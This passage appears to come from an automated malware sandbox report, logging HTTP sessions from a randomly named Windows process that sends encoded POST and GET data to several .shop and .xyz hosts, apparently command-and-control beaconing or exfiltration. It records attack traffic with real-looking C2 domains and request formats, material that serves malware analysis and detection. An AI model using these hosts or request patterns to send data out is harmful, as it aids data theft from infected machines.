cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED] Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Jan 11, 2025 02:45:53.490763903 CET	361	IN	Data Raw: d4 dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 b1 03 Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<Pht
Jan 11, 2025 02:45:53.492463112 CET	21	IN	Data Raw: 62 0d 0a e3 02 00 ed f1 18 60 92 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b`0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49992	188.114.97.3	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:54.883136988 CET	1736	OUT	POST /8g74/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.einpisalpace.shop Origin: http://www.einpisalpace.shop Referer: http://www.einpisalpace.shop/8g74/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 62 4c 58 4c 47 65 79 79 5a 4e 43 57 59 4d 2b 4c 4b 57 67 71 5a 58 65 6c 2b 6e 61 79 69 4b 6a 57 50 66 47 69 75 49 64 41 63 65 4e 61 4c 4b 36 78 48 2b 47 34 44 4a 75 6e 49 65 54 6b 6e 51 2f 5a 59 39 73 57 58 56 74 7a 76 71 5a 5a 4a 59 6f 4d 66 6d 76 6e 72 42 4d 32 77 32 6b 63 39 35 7a 2b 44 62 74 70 30 4f 75 63 62 2b 36 70 43 2b 56 53 47 56 71 4d 70 50 58 41 33 65 70 5a 35 35 76 50 77 70 72 6b 67 34 79 34 37 36 68 70 31 64 6f 31 36 75 65 71 78 56 64 6c 39 73 54 63 59 66 64 74 69 6a 2b 6e 54 30 33 49 38 41 67 68 52 56 56 6a 52 30 79 36 58 72 5a 36 30 4e 32 54 31 45 31 63 52 43 72 42 7a 5a 38 78 38 4a 37 50 51 55 7a 63 43 63 73 33 68 4c 73 35 71 4c 33 39 75 2f 41 46 4c 32 44 6d 65 53 2f 41 73 62 79 61 41 73 52 77 64 47 4f 6d 41 44 51 73 4f 54 50 75 7a 69 54 64 53 6b 44 6c 36 42 68 41 6d 31 33 56 7a 2b 6f 49 6b 67 44 76 55 79 35 61 78 58 37 53 42 36 65 65 71 69 48 45 76 74 47 6b 4c 39 63 79 55 2f 49 53 69 69 6f 33 59 58 78 62 67 4e 33 61 63 34 39 2f 54 42 62 62 2f 37 37 70 4c 78 64 35 70 [TRUNCATED] Data Ascii: cNPH=bLXLGeyyZNCWYM+LKWgqZXel+nayiKjWPfGiuIdAceNaLK6xH+G4DJunIeTknQ/ZY9sWXVtzvqZZJYoMfmvnrBM2w2kc95z+Dbtp0Oucb+6pC+VSGVqMpPXA3epZ55vPwprkg4y476hp1do16ueqxVdl9sTcYfdtij+nT03I8AghRVVjR0y6XrZ60N2T1E1cRCrBzZ8x8J7PQUzcCcs3hLs5qL39u/AFL2DmeS/AsbyaAsRwdGOmADQsOTPuziTdSkDl6BhAm13Vz+oIkgDvUy5axX7SB6eeqiHEvtGkL9cyU/ISiio3YXxbgN3ac49/TBbb/77pLxd5pK+qMwft5JkOxf/rkJbS5loIIcbfAm9t/lVQkILrkw+Bmfj+VwuhANyA3taNnrDzTDLy0K+UcWxKmVhEFEdOjsgpReImiSpG+08/i7vRH1aJmTDqEoE6k2UyLWSz2C2HzP/WdeYYZTAb4QB8PPmrrU/P5TMYG9E5bgATn38K+0UYSia2Zyh0n08S0ENk1pXreeG5CTMlin0FAv7MQD21c0+uWGpHJzrjUwU1lDyHWBbo+fu3/cF1SJYeoKt49foM7llEP30Eu0uW1C9+sn7wQeWcouDst6aTT8jG1uyrthZ5qtRByYT4dTaiS8U369Gzb3dTdNmaP0Or0fm5QE/bKiiPZjvqOWXqtdKwwydMWtJERzkVg8ExrqBD5Mnc5hDrjZ7ZQ1dzqi1pl1fVxTN5x9wmwgr2nOj3Z/8+Uh2PFLMmNSH1o4CCuRPcZNk3AFb/01QkKv8rlYdDPtPDXXxFjT0To/qKQ8QncZundVaanwU6d+FicPZU/saLJc7oIVwLnWoJc08OGT9VtzkvbzvBWzZKyWhoURHQxBah3ulnZbNJoAJkmWhD+RG5U58qyQ2Rcsu/MvsAt2ivfD6DJ8cTRQgLn6QMEHbr3ACWVR4HRwh/f50wY2I3vY182pzvcf3jPTwcYyUO6g3M8ksLCBzDIkQTat6K0dXc0ZR [TRUNCATED]
Jan 11, 2025 02:45:56.020955086 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:45:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ym85cU6Dx702HtqUzpwexMGO3cC8ZzFVIo73Ie8AXs%2BL4H4IXlxnDD4GQE3pjAEguJNLwzjiTEb5%2BXFKYjugcnZQm13EEiQrixcvWGaf4Rz2FhXoSsdLFmody325s21YOm7kttAETnE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90013ae88e5542d5-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1744&rtt_var=872&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1736&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED] Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Jan 11, 2025 02:45:56.020979881 CET	379	IN	Data Raw: 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 b1 03 41 58 e1 Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<PhtD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49993	188.114.97.3	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:57.420515060 CET	443	OUT	GET /8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.einpisalpace.shop Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:45:58.549335957 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:45:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvqRf2IDFePGO6f4zMLMNNFBRyr6VhsrYuqKK5yj%2BwDGZzCjoqckxXKpodF9DlIq%2B4IwawILDyv%2Bhy%2BJ5YQDVFZ3aRmcVr%2B1XuiM4qG2LJnXYaJhhpnaQdlcmUB5ED%2F8LVtqTOH5dgw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90013af859c242b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1901&rtt_var=950&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED] Data Ascii: 592<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="te
Jan 11, 2025 02:45:58.549405098 CET	1053	IN	Data Raw: 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 Data Ascii: xt/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49994	18.163.74.139	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:11.750161886 CET	685	OUT	POST /okq9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.fzmmkj.shop Origin: http://www.fzmmkj.shop Referer: http://www.fzmmkj.shop/okq9/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 43 4b 55 4b 39 2f 2f 5a 65 45 61 36 53 6a 76 39 64 70 69 32 34 50 72 47 38 73 66 4d 57 67 54 64 52 57 7a 43 66 5a 63 42 2b 73 49 44 68 2f 35 6b 5a 41 43 37 5a 2b 30 4e 2f 4a 5a 6b 43 2f 67 5a 36 68 32 6e 66 4a 45 69 70 2f 75 6b 47 39 4a 4f 4f 53 66 4a 5a 49 47 47 48 64 6b 43 32 58 6a 4e 39 68 41 66 35 36 53 48 76 55 37 52 30 58 38 72 62 33 6c 30 68 6b 4f 48 52 34 2b 31 57 36 39 76 4a 70 70 4a 51 33 4c 67 69 77 76 71 50 62 62 41 38 74 35 4e 38 56 34 43 68 77 65 36 44 56 42 43 36 62 50 41 5a 41 4f 2b 6b 36 48 4e 76 5a 78 6f 39 53 6f 63 39 47 51 75 47 6b 66 6f 51 30 62 72 70 4d 30 33 35 56 6d 50 4f 6e 4e 72 71 70 66 76 34 67 3d 3d Data Ascii: cNPH=CKUK9//ZeEa6Sjv9dpi24PrG8sfMWgTdRWzCfZcB+sIDh/5kZAC7Z+0N/JZkC/gZ6h2nfJEip/ukG9JOOSfJZIGGHdkC2XjN9hAf56SHvU7R0X8rb3l0hkOHR4+1W69vJppJQ3LgiwvqPbbA8t5N8V4Chwe6DVBC6bPAZAO+k6HNvZxo9Soc9GQuGkfoQ0brpM035VmPOnNrqpfv4g==
Jan 11, 2025 02:46:12.654278994 CET	163	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 01:46:12 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49995	18.163.74.139	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:14.305784941 CET	705	OUT	POST /okq9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.fzmmkj.shop Origin: http://www.fzmmkj.shop Referer: http://www.fzmmkj.shop/okq9/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 43 4b 55 4b 39 2f 2f 5a 65 45 61 36 55 41 33 39 52 71 36 32 36 76 72 4a 6c 63 66 4d 66 41 54 47 52 57 2f 43 66 59 70 61 2b 66 67 44 67 64 78 6b 61 42 43 37 61 2b 30 4e 78 70 5a 38 49 66 67 43 36 6d 2b 5a 66 4a 49 69 70 2f 53 6b 47 38 35 4f 4f 6c 72 4f 5a 59 47 2b 4c 39 6c 6b 35 33 6a 4e 39 68 41 66 35 36 47 35 76 55 6a 52 30 6e 4d 72 61 57 6c 33 73 45 4f 45 62 59 2b 31 64 61 39 56 4a 70 6f 71 51 32 57 48 69 7a 48 71 50 62 72 41 2f 38 35 4f 72 6c 35 4a 76 51 66 49 41 51 73 58 77 70 6a 6f 65 78 79 64 72 39 50 5a 6e 50 77 4b 6e 77 6b 77 6a 58 6f 56 43 6d 37 65 48 53 47 65 72 4e 77 76 30 33 53 75 52 51 6f 42 6e 37 2b 72 75 55 62 48 61 74 63 66 35 61 39 69 4e 4e 43 7a 70 37 34 2b 53 72 51 3d Data Ascii: cNPH=CKUK9//ZeEa6UA39Rq626vrJlcfMfATGRW/CfYpa+fgDgdxkaBC7a+0NxpZ8IfgC6m+ZfJIip/SkG85OOlrOZYG+L9lk53jN9hAf56G5vUjR0nMraWl3sEOEbY+1da9VJpoqQ2WHizHqPbrA/85Orl5JvQfIAQsXwpjoexydr9PZnPwKnwkwjXoVCm7eHSGerNwv03SuRQoBn7+ruUbHatcf5a9iNNCzp74+SrQ=
Jan 11, 2025 02:46:15.237441063 CET	163	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 01:46:15 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49996	18.163.74.139	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:16.846302032 CET	1718	OUT	POST /okq9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.fzmmkj.shop Origin: http://www.fzmmkj.shop Referer: http://www.fzmmkj.shop/okq9/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 43 4b 55 4b 39 2f 2f 5a 65 45 61 36 55 41 33 39 52 71 36 32 36 76 72 4a 6c 63 66 4d 66 41 54 47 52 57 2f 43 66 59 70 61 2b 66 34 44 67 75 70 6b 59 69 71 37 62 2b 30 4e 35 4a 5a 2f 49 66 68 51 36 67 57 64 66 49 30 59 70 36 65 6b 47 65 78 4f 66 68 33 4f 54 59 47 2b 55 4e 6b 44 32 58 69 50 39 68 52 57 35 36 57 35 76 55 6a 52 30 6c 45 72 64 48 6c 33 2f 55 4f 48 52 34 2b 68 57 36 38 62 4a 70 68 52 51 32 43 39 6a 43 6e 71 50 2f 50 41 36 4f 68 4f 70 46 35 4c 2f 41 66 51 41 51 70 48 77 70 76 6b 65 78 47 6e 72 36 4c 5a 30 34 73 57 33 42 38 70 33 30 77 39 4f 6d 7a 77 4e 42 57 74 76 66 77 70 36 46 65 5a 62 42 59 30 69 6f 33 6d 34 79 48 41 4d 65 67 5a 31 34 70 77 4e 38 43 35 7a 35 30 71 4a 4f 4e 62 4a 66 51 6d 38 79 58 35 41 7a 31 71 58 75 59 6e 67 37 4c 48 72 4a 69 32 73 6c 53 57 63 73 6e 48 31 7a 65 62 32 75 5a 59 30 2f 37 4f 41 4c 79 58 73 50 6a 37 34 45 70 39 73 35 6c 70 62 68 6f 39 68 59 2b 75 4e 4a 39 7a 6a 4d 34 67 4d 64 42 41 6d 38 6c 32 67 66 6b 39 78 4a 72 51 70 4f 57 32 57 4d 34 68 54 [TRUNCATED] Data Ascii: cNPH=CKUK9//ZeEa6UA39Rq626vrJlcfMfATGRW/CfYpa+f4DgupkYiq7b+0N5JZ/IfhQ6gWdfI0Yp6ekGexOfh3OTYG+UNkD2XiP9hRW56W5vUjR0lErdHl3/UOHR4+hW68bJphRQ2C9jCnqP/PA6OhOpF5L/AfQAQpHwpvkexGnr6LZ04sW3B8p30w9OmzwNBWtvfwp6FeZbBY0io3m4yHAMegZ14pwN8C5z50qJONbJfQm8yX5Az1qXuYng7LHrJi2slSWcsnH1zeb2uZY0/7OALyXsPj74Ep9s5lpbho9hY+uNJ9zjM4gMdBAm8l2gfk9xJrQpOW2WM4hTrHRJjo4XsE3PQCEiYRxOif/pXWAl1q9fJmHfSewnBwIS8atl1tsyTl22/YAtUP1PGAE6H2jgOv+/wiWRmq2/Clfql6PEamjHzesie/HXdaURQQoKmyb8/lgKF/Nd87oQxXVuEfXqqclzc6Ru6FwUWfQC95a2B2sWH2V/DgXccWqtVYrAadNzUVyb5lrxsHhXNfws8S9SPnY3z233yVdb+o5q8AQWSObvKkxUjQocSRGMOpAF5R1xRN3eCxiwxBo4vB12F0dt2e06gN9339fJwB92mJ99BHlRpDF0khFo132HyRjeAiJs+OSpFwq2Ks7FkFNMt3TAlhGiXUsKCIR4GwkzJfimOBXsYnc6GQOt7gTB2cHJ7YI6JGaVSz3+hA/wO55cdG3N7on+GMG3wp+O7x0qdtVe90ytHogPIciE01970GTwW5UB8QAw7DxgqK/mZXbcwPzrg7PgYKqkIxbhPW/H2YoNWqUCFSen4sCNidCui3M2q36cA8BC8JujVuOehd/1YDDrs559FaxuPcZ5B56GGBVjU/oBok3rmICfBvrmChVROam7Zuj36Zbj0/5rsikqFIfsAduOWsDY38XG4jwx/8drjllhpM00ZGHBWtVOfL+Ro9IdsNtw1dwfL/TJY8AO/Js0YglyGHiORMQ7RqgNLmE/MTwwBQ [TRUNCATED]
Jan 11, 2025 02:46:17.772213936 CET	163	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 01:46:17 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49997	18.163.74.139	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:19.388154030 CET	437	OUT	GET /okq9/?cNPH=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.fzmmkj.shop Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:46:20.314753056 CET	163	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 01:46:20 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49998	162.218.30.235	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:25.834757090 CET	682	OUT	POST /798t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.l03678.xyz Origin: http://www.l03678.xyz Referer: http://www.l03678.xyz/798t/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 2f 52 38 54 48 70 34 58 4c 69 2f 4c 50 72 49 51 4c 58 39 68 71 46 61 48 54 73 30 79 34 47 2b 46 54 69 64 37 30 48 67 48 5a 32 7a 54 65 43 7a 6a 55 37 69 6b 51 76 46 46 63 70 52 49 6c 45 59 7a 56 4a 61 39 6f 72 77 2f 4e 48 66 6d 73 72 51 43 6e 6d 66 30 72 2f 2f 59 4c 33 6e 56 54 4d 69 67 43 49 5a 77 46 39 6e 78 48 6d 42 6f 54 4e 57 73 4f 36 62 57 48 73 31 4b 76 2b 62 59 6c 4a 44 49 59 36 7a 37 79 6a 4e 2b 57 6b 39 4d 4c 31 62 52 77 38 4b 77 75 6b 64 31 79 51 36 7a 4f 64 66 77 33 77 48 76 63 4a 37 43 5a 59 42 62 48 2f 49 6b 73 4e 48 2b 63 6f 47 5a 51 48 6a 5a 75 46 35 75 50 32 38 37 41 62 33 46 73 67 6a 70 4c 4c 55 6a 4b 41 3d 3d Data Ascii: cNPH=/R8THp4XLi/LPrIQLX9hqFaHTs0y4G+FTid70HgHZ2zTeCzjU7ikQvFFcpRIlEYzVJa9orw/NHfmsrQCnmf0r//YL3nVTMigCIZwF9nxHmBoTNWsO6bWHs1Kv+bYlJDIY6z7yjN+Wk9ML1bRw8Kwukd1yQ6zOdfw3wHvcJ7CZYBbH/IksNH+coGZQHjZuF5uP287Ab3FsgjpLLUjKA==
Jan 11, 2025 02:46:26.466876984 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/ Server: Microsoft-IIS/10.0 Date: Sat, 11 Jan 2025 01:46:26 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 32 31 32 38 2f 37 39 38 74 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a 